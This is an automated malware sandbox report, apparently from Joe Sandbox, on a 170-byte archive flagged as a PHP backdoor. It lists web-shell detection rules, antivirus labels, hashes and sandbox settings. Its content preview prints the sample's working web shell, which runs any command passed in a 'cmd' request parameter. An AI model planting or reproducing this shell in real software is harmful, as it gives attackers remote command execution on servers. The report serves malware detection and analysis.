Windows
Analysis Report
stroop-master.zip
Overview
General Information
Detection
Score: | 56 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
webshell_simple_backdoor | Web Shell - file simple-backdoor.php | Florian Roth |
| |
WebShell_Simple_PHP_backdoor_by_DK | PHP Webshells Github Archive - file Simple_PHP_backdoor_by_DK.php | Florian Roth |
|
Click to jump to signature section
AV Detection |
---|
Source: | ReversingLabs: |
System Summary |
---|
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Classification label: |
Source: | ReversingLabs: |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
32% | ReversingLabs | Script-PHP.Backdoor.Yorcirekrikseng |
Joe Sandbox version: | 40.0.0 Tourmaline |
Analysis ID: | 1430585 |
Start date and time: | 2024-04-23 22:48:08 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 2m 10s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | defaultwindowsinteractivecookbook.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 11 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | stroop-master.zip |
Detection: | MAL |
Classification: | mal56.winZIP@0/0@0/0 |
Cookbook Comments: |
|
- No process behavior to analyse as no analysis process or sample was found
- Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe
- Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
- VT rate limit hit for: stroop-master.zip
File type: | |
Entropy (8bit): | 4.449015511855094 |
TrID: | |
File name: | stroop-master.zip |
File size: | 170 bytes |
MD5: | 5127dd7dec482d81ea1d10be3d7c31d1 |
SHA1: | 11c57fe7eee4518cce026962ee42aedfd4b4fc03 |
SHA256: | b31580e55640ffde6967ba13303b4207bb49242dba5168e695a530ce26a032ff |
SHA512: | 5996b9d9e8c3a08392297d70de860d60ffdf20a39d8eb3108d0da74e1424a9baa7937abf04638b061e46256911abfec33f1a106c12c7ccf7df499e1f72951533 |
SSDEEP: | 3:ZoUogv9G87MAdFFFBe5VX+Xv/FBiFQ29G87M36mITBMeWFZe5KVDov/TTv:WU9vk1OFB2+X7kk1U1W3z8X |
TLSH: | CFC04CA23A4E911562748475424D2814E445414F54209B1574DEA061AF3B0BBA5F89BC |
File Content Preview: | <?php....if(isset($_REQUEST['cmd'])){.. echo "<pre>";.. $cmd = ($_REQUEST['cmd']);.. system($cmd);.. echo "</pre>";.. die;..}....?>.... |
Icon Hash: | 1c1c1e4e4ececedc |